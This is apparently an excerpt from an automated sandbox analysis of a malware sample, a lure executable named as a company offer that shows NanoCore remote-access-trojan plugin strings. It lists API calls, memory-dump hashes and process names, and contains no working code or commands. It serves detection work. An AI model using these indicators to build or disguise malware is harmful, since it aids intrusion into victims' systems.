Source File: 00000008.00000002.731960483.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e80cd74c165c830de67026d2fcc7b9d2174d1b527b265a0ff03025f51d7a16b8
Instruction ID: 935fc6921209300e545a740a330c42c1b2fd83a6f0962298e30e6074decea6fc
Opcode Fuzzy Hash: e80cd74c165c830de67026d2fcc7b9d2174d1b527b265a0ff03025f51d7a16b8
Instruction Fuzzy Hash: 141125B19042488BCB10DFAAC4447EEFBF4EF89324F14882AD519A7250CB79A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E6BDA8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02E6BE0E

Memory Dump Source

Source File: 00000008.00000002.723185651.0000000002E60000.00000040.00000001.sdmp, Offset: 02E60000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 375573bcd96771592c535cc304fd13516c54c654bae05f799f63fb6b9ee39440
Instruction ID: c6317b9c730f4d52fe054f0dc5daccbb12918abe8f783883c124a2298e5d208e
Opcode Fuzzy Hash: 375573bcd96771592c535cc304fd13516c54c654bae05f799f63fb6b9ee39440
Instruction Fuzzy Hash: 5611E3B6D042498FDB10CF9AD444BDEFBF4EB88368F14842AD519B7600C779A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 071F2478, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 071FDD15

Memory Dump Source

Source File: 00000008.00000002.731960483.00000000071F0000.00000040.00000001.sdmp, Offset: 071F0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 2462f974c87ddba3620cde22ed7721eed78f9f8544a0387bb5ed83287bf14c8a
Instruction ID: a884d9b799b02d4cd4d3d9fc701afe34ba700298f6dcd92d405f1a43f1cf50a6
Opcode Fuzzy Hash: 2462f974c87ddba3620cde22ed7721eed78f9f8544a0387bb5ed83287bf14c8a
Instruction Fuzzy Hash: 531103B5904349DFDB10CF99D884BEEBBF8EB48324F10841AE955A7640D3B8A944CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 02E6DEC0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 02E6DF1D

Memory Dump Source

Source File: 00000008.00000002.723185651.0000000002E60000.00000040.00000001.sdmp, Offset: 02E60000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 00f076cd2a56fd6473a89600fbeba0f98c5ea2ff5336f514e5452b4c984610ab
Instruction ID: 65532f6d2199df1ad87ce5570a0f0399f36488ccc62988f243d5013ce22c10b6
Opcode Fuzzy Hash: 00f076cd2a56fd6473a89600fbeba0f98c5ea2ff5336f514e5452b4c984610ab
Instruction Fuzzy Hash: 0F1115B59002089FDB10CF9AD889BDEBBF8EB48324F10841AD915A7700C378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02E6DEB9, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 02E6DF1D

Memory Dump Source

Source File: 00000008.00000002.723185651.0000000002E60000.00000040.00000001.sdmp, Offset: 02E60000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: ffd14a8262ef264c6b681c09322b04e01f5356d792fe6513e66544d1ab758b2c
Instruction ID: d99fdf721e3948ebb780f93e1ad346423e069c780eaa5af4ed49c832d618861f
Opcode Fuzzy Hash: ffd14a8262ef264c6b681c09322b04e01f5356d792fe6513e66544d1ab758b2c
Instruction Fuzzy Hash: 321103B6900208CFDB10CF99D989BEEBBF4EB58324F14851AD915B7640C378A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0118D4D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.719209328.000000000118D000.00000040.00000001.sdmp, Offset: 0118D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ebdcf6734cb4398773d1215d31052f1f2933e264b70a95f217a70e66f515409
Instruction ID: 330fcc6ae8cf5a0e1d630e64316f39ddc307b9a36d7a40a9720160d767415af0
Opcode Fuzzy Hash: 2ebdcf6734cb4398773d1215d31052f1f2933e264b70a95f217a70e66f515409
Instruction Fuzzy Hash: 4821F471504340DFDF09EF94E9C0B26BB75FB88328F24C56AE9054B286C336D846CAB2

Uniqueness

Uniqueness Score: -1.00%

Function 0118D3EC, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.719209328.000000000118D000.00000040.00000001.sdmp, Offset: 0118D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c2ad7b96370360ab535373aa67b27ef807019c25ab2ca1684af1bba3000a1d6
Instruction ID: 91dceab9fa2d9ae2c7195ddf47aa6e4ee78c31cfeb228ba73f9181c79dc69bbf
Opcode Fuzzy Hash: 6c2ad7b96370360ab535373aa67b27ef807019c25ab2ca1684af1bba3000a1d6
Instruction Fuzzy Hash: 43212D71504344EFDF09EF98E4C0B66BB65FB84324F14C569D9050B647C336E456CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0163D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.722607896.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3cfd921c138a201f49b727056ede1dca5870d8bf3cd149976604502c75193b7
Instruction ID: b9a0f896fd29eca28c8aa14c74ddbb63a988f1417989a026d95023b21a5d2cc6
Opcode Fuzzy Hash: c3cfd921c138a201f49b727056ede1dca5870d8bf3cd149976604502c75193b7
Instruction Fuzzy Hash: F5210771504240EFDB05CF94DDC0B26BB65FBC8324F64C56DEA094B346C776D846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0163D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.722607896.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f4f0348240eefb1f26c605e4829897718ced4866124215e5b6197fb1a413ade
Instruction ID: c1ad6e1dd628c8d1655972f95855149bb099bfb4b915d3ab91eedb31419469b6
Opcode Fuzzy Hash: 7f4f0348240eefb1f26c605e4829897718ced4866124215e5b6197fb1a413ade
Instruction Fuzzy Hash: B82103B1604240DFCB15CF54D8C0B26FB65FB88A54F60C569D80A4B346C336D847CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0118D4D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.719209328.000000000118D000.00000040.00000001.sdmp, Offset: 0118D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
Instruction ID: 8fd936fd26ef67f5ca8b10cf8f67f8409cc76fc4d112b73a00a63e4061705043
Opcode Fuzzy Hash: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
Instruction Fuzzy Hash: 05119D76404380DFCF16DF54E5C4B16BF71FB84224F24C6AAD8054A656C33AD456CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0118D3E7, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.719209328.000000000118D000.00000040.00000001.sdmp, Offset: 0118D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
Instruction ID: 313f4c40857c22547db63379608939a8875751196f42c5b496fb691ad491c6ee
Opcode Fuzzy Hash: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
Instruction Fuzzy Hash: F711AF76404280DFCF06DF58E5C4B56BF72FB84320F24C6A9D8494BA56C33AE456CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0163D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.722607896.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d36124553d90c539148c45a8a93ecca56ad8a74831c1bc612bfc5b4ddcdf7be
Instruction ID: 9bd0b69019848947dbd7740646722a20a642d1458d29c095f973e075d53c4407
Opcode Fuzzy Hash: 7d36124553d90c539148c45a8a93ecca56ad8a74831c1bc612bfc5b4ddcdf7be
Instruction Fuzzy Hash: 53118B75908280DFDB12CF54D9C4B15FBA1FB84724F28C6AAD8494B756C33AD44ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0163D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.722607896.000000000163D000.00000040.00000001.sdmp, Offset: 0163D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d36124553d90c539148c45a8a93ecca56ad8a74831c1bc612bfc5b4ddcdf7be
Instruction ID: 73496696d94e2d77f9937f7da96932929ebedf69948a42be7c57f63d8bdeee41
Opcode Fuzzy Hash: 7d36124553d90c539148c45a8a93ecca56ad8a74831c1bc612bfc5b4ddcdf7be
Instruction Fuzzy Hash: AA11B875904280DFCB02CF54C9C4B15BBB1FB84224F28C6AAD9494B756C33AD84ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0607056B, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.730311489.0000000006070000.00000040.00000001.sdmp, Offset: 06070000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 631f8bdceada27284f17aba7561e1cdcccf46248fca3331a222eb89de263c458
Instruction ID: 7719e6acbc97351e98efc4c1e121ca7afc9185357614b575a644593e7559727c
Opcode Fuzzy Hash: 631f8bdceada27284f17aba7561e1cdcccf46248fca3331a222eb89de263c458
Instruction Fuzzy Hash: EA113A709493859FC34AEF78C85594A7FB1AF07224B1686EFD095CB2B2C735894ACB11

Uniqueness

Uniqueness Score: -1.00%

Function 0118D75D, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.719209328.000000000118D000.00000040.00000001.sdmp, Offset: 0118D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73b178660f113307878bb507a184adb22b3f363255e976de2c60663b5565e638
Instruction ID: 946a0ea63b704a4623a02f76aad5e74c879db58a94bf8656435294c1a5b83deb
Opcode Fuzzy Hash: 73b178660f113307878bb507a184adb22b3f363255e976de2c60663b5565e638
Instruction Fuzzy Hash: 3301F771008784AAEF187E96EC80766BBD8EF45628F09C459EE041A2C6C7789844CEB2

Uniqueness

Uniqueness Score: -1.00%

Function 0118D75C, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.719209328.000000000118D000.00000040.00000001.sdmp, Offset: 0118D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0a0e55d4fc642b6a0b298dd78cdd18f6e16b899dff69982d63d115d26e02baa
Instruction ID: 124f9848fbb66c0a0dd6dbac0e40d502c80d316c316079baf50b3ea192f9ff2d
Opcode Fuzzy Hash: a0a0e55d4fc642b6a0b298dd78cdd18f6e16b899dff69982d63d115d26e02baa
Instruction Fuzzy Hash: 9AF068714047849EEB159A16DC84B62FFD8EB41634F18C45AEE445B286C3799844CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 06070508, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.730311489.0000000006070000.00000040.00000001.sdmp, Offset: 06070000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51b88751d6ac121e9dbe6441e4b9ff35a215c543ee12d4b27d18335b8ce4a694
Instruction ID: 1205d1e2fc5fe9936eee30e690b4b5761cf8814af1a0f947642fa8f3efaf7890
Opcode Fuzzy Hash: 51b88751d6ac121e9dbe6441e4b9ff35a215c543ee12d4b27d18335b8ce4a694
Instruction Fuzzy Hash: 40F05EB0D413159FD794DF7A984566FBFF4EF08300F104A2DD00AE6210E7718541CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06070518, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.730311489.0000000006070000.00000040.00000001.sdmp, Offset: 06070000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6b8329e222bd510dde77f6b14167a690d9da377dbcfc5666e2be7a9b874b9a9
Instruction ID: 4ee5e67d25eb0d66b5e2ba0b023fec1cf0e5b45f1fa9c326d350f20ab1aaa105
Opcode Fuzzy Hash: b6b8329e222bd510dde77f6b14167a690d9da377dbcfc5666e2be7a9b874b9a9
Instruction Fuzzy Hash: EFE0C9B0D4031A9FD790DF6E984566FBFF4AF48700F508929D44AE7240EB719A40CBA5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: dhcpmon.exe PID: 6052 Parent PID: 6848 dhcpmon.exeCOMMON

Executed Functions

Function 013B93E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 013B962E

Memory Dump Source

Source File: 0000000E.00000002.739714938.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 91c3b7aa07acc75f738f0c5d9234fc4f44980ed9346e0294219387c5a1329d61
Instruction ID: 872698a505215bec16cb9f2ae3767782c7be5b4c3aa0dd5ca5f0469576050b2e
Opcode Fuzzy Hash: 91c3b7aa07acc75f738f0c5d9234fc4f44980ed9346e0294219387c5a1329d61
Instruction Fuzzy Hash: DF7136B0A10B058FD764DF2AD48579ABBF5BF88218F00892DD64AD7B50E774E805CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013BFB98, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013BFD0A

Memory Dump Source

Source File: 0000000E.00000002.739714938.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 66c115ee6f3ce711b8a5e7a99262f4fdd2d705acfac2df4196e6552c79b65794
Instruction ID: 7b80141bbfc65d2a9cee08f97cff59f3aa1d4718ffb3c5a33c0b3c50883e9f8c
Opcode Fuzzy Hash: 66c115ee6f3ce711b8a5e7a99262f4fdd2d705acfac2df4196e6552c79b65794
Instruction Fuzzy Hash: 235110B1C04249AFDF05CFA9C880ADDBFB5BF48314F24816AE918AB221D7359995CF50

Uniqueness

Uniqueness Score: -1.00%

Function 013BFB61, Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013BFD0A

Memory Dump Source

Source File: 0000000E.00000002.739714938.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 14ec3586bd9522b4b4301bddb923256985a6cebc02ca480e96c0ef9431c53255
Instruction ID: 20e51ace31ed756b2c6b09fea22ce935b980675659f6a4596f2d2d07dcea6493
Opcode Fuzzy Hash: 14ec3586bd9522b4b4301bddb923256985a6cebc02ca480e96c0ef9431c53255
Instruction Fuzzy Hash: A251F3B1D00349AFDF14CFA9C884ADDBFB5BF48314F24812AE814AB215D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 013BDA04, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 013BFD0A

Memory Dump Source

Source File: 0000000E.00000002.739714938.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: bd3387d4c408c3c03dbe49a7b2e31648b84bfca09b8b79f8ab98081771ead956
Instruction ID: f857624a62dd0f76abe98b26b86946cdf33f13280af3c0f3f8766c9a755020ed
Opcode Fuzzy Hash: bd3387d4c408c3c03dbe49a7b2e31648b84bfca09b8b79f8ab98081771ead956
Instruction Fuzzy Hash: 7E51A0B1D00309AFDB14CFAAC884ADEBBB5BF48314F24812AE919AB614D7749945CF90

Uniqueness

Uniqueness Score: -1.00%

Function 013BA14C, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013BBCC6,?,?,?,?,?), ref: 013BBD87

Memory Dump Source

Source File: 0000000E.00000002.739714938.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4e5de90b2b24fa1a804f6d04ec3f634f556e6d8d1ae3abaee332f1dc568eb32c
Instruction ID: 9c72e00910d4aa488335a74105931994c479358d60149ce4d1ec1b782022085a
Opcode Fuzzy Hash: 4e5de90b2b24fa1a804f6d04ec3f634f556e6d8d1ae3abaee332f1dc568eb32c
Instruction Fuzzy Hash: 9621E9B5900248EFDB10CF99D984BDEFBF8EB48314F14841AE914A7710D778A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 013BBCF9, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013BBCC6,?,?,?,?,?), ref: 013BBD87

Memory Dump Source

Source File: 0000000E.00000002.739714938.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a5205a6a9551468c1e962b50e505e3cfeab0686447efdff84ba99ab31ac14d99
Instruction ID: c185c2c890a7acb5d610b27a0f0c3ad3e5710e0efb3f5d51f2aa298d0a866610
Opcode Fuzzy Hash: a5205a6a9551468c1e962b50e505e3cfeab0686447efdff84ba99ab31ac14d99
Instruction Fuzzy Hash: 3221E5B5900258AFDB10CFAAD884ADEFFF4EB48324F14841AE954A7310D778A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 013B8768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013B96A9,00000800,00000000,00000000), ref: 013B98BA

Memory Dump Source

Source File: 0000000E.00000002.739714938.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ad4f07424b626a3b600dbb36af072d49da5b02171a16cff70aba906caa3bd2ca
Instruction ID: 3c8734af3c7617e65dfcb0fd14c8dc3c1be9a93cd6eec540445ba0f5b76cab55
Opcode Fuzzy Hash: ad4f07424b626a3b600dbb36af072d49da5b02171a16cff70aba906caa3bd2ca
Instruction Fuzzy Hash: 3811F4B69002499BDB10CF9AD484BDEBBF4EB48314F14842AD615A7600D375A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 013B9849, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,013B96A9,00000800,00000000,00000000), ref: 013B98BA

Memory Dump Source

Source File: 0000000E.00000002.739714938.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6fcc3450d094fdf02b23acc11446047642fa3aca687ec836b066062ffd298f29
Instruction ID: ae460d0f73b079f4c22fe27d13c40ba2fa7ee41b7610a20ce4a3e55399e5e89c
Opcode Fuzzy Hash: 6fcc3450d094fdf02b23acc11446047642fa3aca687ec836b066062ffd298f29
Instruction Fuzzy Hash: AB1103B6D002499FDB10CF9AD484BDEFFF4AB89324F14842AD525A7600C774A545CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 013B95C8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 013B962E

Memory Dump Source

Source File: 0000000E.00000002.739714938.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ad7093be56dcc5f7329f9f744c289b4797e4c1e646ecfddd3eb96f9fcc97fae0
Instruction ID: d49dc4dbf5a8ef13be7bc740a7196cb2feb25a9bdf342d6aa542f11d3c207444
Opcode Fuzzy Hash: ad7093be56dcc5f7329f9f744c289b4797e4c1e646ecfddd3eb96f9fcc97fae0
Instruction Fuzzy Hash: 6F11F5B5D002498FDB10CF9AD444BDEFBF4EF89328F14841AD519A7600D374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 013BDA3C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,013BFE28,?,?,?,?), ref: 013BFE9D

Memory Dump Source

Source File: 0000000E.00000002.739714938.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: b5924e65104da361743283703f69687d7ecf131a0b94901b4f4b27ff54489356
Instruction ID: 507788f0b28af900134131f7e10ca5a6547097e8e2c37353f5b91a4453c4d485
Opcode Fuzzy Hash: b5924e65104da361743283703f69687d7ecf131a0b94901b4f4b27ff54489356
Instruction Fuzzy Hash: 031106B58002489FDB10DF9AD985BEEBBF8EB48724F108419E919A7701D374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 013BFE38, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,013BFE28,?,?,?,?), ref: 013BFE9D

Memory Dump Source

Source File: 0000000E.00000002.739714938.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 1d5494958fe88936bd2322919f99ecc81265509adf7e6828160e094ba28555b4
Instruction ID: 157e0ab41d8b5f6e37b9b1882fc4276e50d56a3236e478e881ec731b6110a8bb
Opcode Fuzzy Hash: 1d5494958fe88936bd2322919f99ecc81265509adf7e6828160e094ba28555b4
Instruction Fuzzy Hash: 8E1118B58042489FDB10CF99D485BDEFFF8EB48724F10841AD958A7741C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 012AD4A0, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.739359217.00000000012AD000.00000040.00000001.sdmp, Offset: 012AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f637701ff40a795818b405accdffb65234eaeb269b7e5e0bbe317b62e8adf4d0
Instruction ID: 20f029f240a0c5f07d91a9b9f026d99e13d41adb0d35e307ada5c950bdc71831
Opcode Fuzzy Hash: f637701ff40a795818b405accdffb65234eaeb269b7e5e0bbe317b62e8adf4d0
Instruction Fuzzy Hash: C7216AB1514248DFDF05CF84E8C0B66BF61FB88328F608569D9050B607C376E806C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 012BD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.739401133.00000000012BD000.00000040.00000001.sdmp, Offset: 012BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af70ce6aff9d33a318244acc39850cc7660912cff8e4db1dcd0dce93d37b2c4
Instruction ID: eeafefb5469791ab50d542efc019cb95fa89b9dae6da774ad14f9eea1d90f9ec
Opcode Fuzzy Hash: 5af70ce6aff9d33a318244acc39850cc7660912cff8e4db1dcd0dce93d37b2c4
Instruction Fuzzy Hash: FE213775618248DFCB15CF54D8C0BA6BB61FB88398F24C96DD9094B346C37BD807CA61

Uniqueness

Uniqueness Score: -1.00%

Function 012BD006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.739401133.00000000012BD000.00000040.00000001.sdmp, Offset: 012BD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c32a74f2cb50c5a497eb779ea8d8c202424cb134bba252a42946efbc4d16a788
Instruction ID: b1ff613d459cc3647249bdf2a267a14288163a389fae13837c1d8ee5a44f3a56
Opcode Fuzzy Hash: c32a74f2cb50c5a497eb779ea8d8c202424cb134bba252a42946efbc4d16a788
Instruction Fuzzy Hash: 99217F754083849FCB02CF24D994B51BF71EB46354F28C5DAD9498B267C33A985ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 012AD49B, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.739359217.00000000012AD000.00000040.00000001.sdmp, Offset: 012AD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
Instruction ID: 51a4fcf7202268bdbdec222a7bc74733ed5c58c83b49f30fa559c95d18ff3968
Opcode Fuzzy Hash: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
Instruction Fuzzy Hash: 5E11B1B6804284CFDF12CF54D5C4B56BF71FB84324F2486A9D9454B617C33AD456CBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe	Binary or memory string: OriginalFilename vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.672841127.0000000002E21000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAsyncState.dllF vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000000.644771334.0000000000A72000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameDllImportAttribute.exe6 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.683010152.0000000008E50000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.673275286.0000000003E29000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameLegacyPathHandling.dllN vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.682842531.00000000078B0000.00000002.00000001.sdmp	Binary or memory string: originalfilename vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.682842531.00000000078B0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.682775194.0000000007850000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000000.670782996.00000000009A2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameDllImportAttribute.exe6 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameCoreClientPlugin.dll8 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameNanoCoreBase.dll< vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameFileBrowserClient.dllT vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll4 vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs COMPANY PROFILE AND DOCUMENTED OFFER.exe
